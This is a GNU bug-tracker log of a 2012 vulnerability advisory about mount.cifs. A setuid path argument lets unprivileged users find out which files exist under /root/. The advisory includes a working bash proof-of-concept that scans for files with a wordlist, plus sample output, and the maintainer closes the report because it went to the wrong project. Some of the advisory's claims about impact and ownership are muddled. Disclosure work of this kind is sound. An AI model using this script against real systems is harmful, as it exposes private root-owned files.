GNU bug report logs -
#10965
mount.cifs vulnerability
Reported by: Jesus Olmos <jesus.olmos <at> blueliv.com>
Date: Wed, 7 Mar 2012 18:40:02 UTC
Severity: normal
Tags: notabug
Done: Eric Blake <eblake <at> redhat.com>
Report forwarded to bug-coreutils <at> gnu.org: bug#10965; Package coreutils. (Wed, 07 Mar 2012 18:40:02 GMT)
Acknowledgement sent to Jesus Olmos <jesus.olmos <at> blueliv.com>: New bug report received and forwarded. Copy sent to bug-coreutils <at> gnu.org. (Wed, 07 Mar 2012 18:40:02 GMT)
Message #5 received at submit <at> debbugs.gnu.org (full text, mbox):
Hello, here is a bug report for mount.cifs; it is a little security breach on Linux permissions by controlling a privileged chdir().
Regards.
########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################
1. VULNERABILITY
-------------------------
Linux arbitrary privileged chdir(); this leads to arbitrary file identification as root.
2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of the Linux base system, and is setuid on most distributions.
This software mounts CIFS partitions to directories authorized by fstab.
3. DESCRIPTION
-------------------------
Although there are no authorized CIFS mounts, it is possible, via the second parameter, to control a privileged chdir() syscall and infer its return value through the responses.
This implies a little security breach on Linux permissions: a non-root user can enumerate files and directories as root.
This can help to exploit other vulnerabilities, enumerate /root/ contents, descriptors used by any process, user homes, etc.
One of the attack vectors is a /root/ directory scan:
[sha0 <at> spinlock advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret
It also lets one enumerate sub-subdirectories in order to dump readable files.
4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by jesus.olmos <at> blueliv.com
# discover root protected files & directories, user homes, process
# descriptors, ...
path=$2
wordlist=$1
for i in `cat "$wordlist"`
do
  echo -n "$i:"
  /sbin/mount.cifs //127.0.0.1/a "$path/$i"
done 2>log.$$ 1>&2
echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
  echo "$i"
done
echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
  echo "$i"
done
rm log.$$
5. BUSINESS IMPACT
-------------------------
Confidentiality can be breached.
This method of transferring files is highly dangerous and can rely on remote control of the server.
6. SYSTEMS AFFECTED
-------------------------
All versions are affected.
7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.
8. REFERENCES
-------------------------
http://gnu.org
9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV
10. DISCLOSURE TIMELINE
-------------------------
February 20, 2012: Vulnerability discovered
March 07, 2012: Reported to the vendor
11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
--
Jesus Olmos
jesus.olmos <at> blueliv.com
Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900
Added tag(s) notabug. Request was from Eric Blake <eblake <at> redhat.com> to control <at> debbugs.gnu.org. (Wed, 07 Mar 2012 18:48:01 GMT)
Reply sent to Eric Blake <eblake <at> redhat.com>: You have taken responsibility. (Wed, 07 Mar 2012 18:48:02 GMT)
Notification sent to Jesus Olmos <jesus.olmos <at> blueliv.com>: bug acknowledged by developer. (Wed, 07 Mar 2012 18:48:02 GMT)
Message #12 received at 10965-done <at> debbugs.gnu.org (full text, mbox):
tag 10965 notabug
thanks
On 03/07/2012 11:33 AM, Jesus Olmos wrote:
> Hello, here is a bug report for mount.cifs,
> is a little security breach on linux permissions by controlling a
> privileged chdir()
Thanks for the report, but you have sent it to the wrong list. GNU
coreutils does not maintain mount.cifs, so there is nothing this list
can do about fixing anything. I'm closing the coreutils bug aspect,
although I encourage you to continue pursuing a correct fix with the
correct folks in charge of mount.cifs.
--
Eric Blake eblake <at> redhat.com +1-919-301-3266
Libvirt virtualization library http://libvirt.org
bug archived. Request was from Debbugs Internal Request <help-debbugs <at> gnu.org> to internal_control <at> debbugs.gnu.org. (Thu, 05 Apr 2012 11:24:03 GMT)
GNU bug tracking system
Copyright (C) 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson.